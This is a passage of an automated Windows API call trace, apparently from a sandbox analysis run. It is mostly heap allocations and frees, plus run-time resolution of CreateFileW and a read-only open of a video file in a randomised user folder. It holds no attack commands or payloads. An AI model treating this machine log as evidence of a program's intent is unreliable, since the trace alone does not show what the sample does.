lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0106.426] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0106.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0106.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.429] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0106.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0106.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0106.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.429] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0106.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0106.430] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\kdypgegxqaqduuftfw.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0106.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0106.431] FreeLibrary (hLibModule=0x772d0000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0106.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.433] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.433] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.433] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0106.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d3920 | out: hHeap=0x1780000) returned 1 [0106.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0106.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0106.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0106.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.435] WideCharToMultiByte (in: CodePage=0x0, 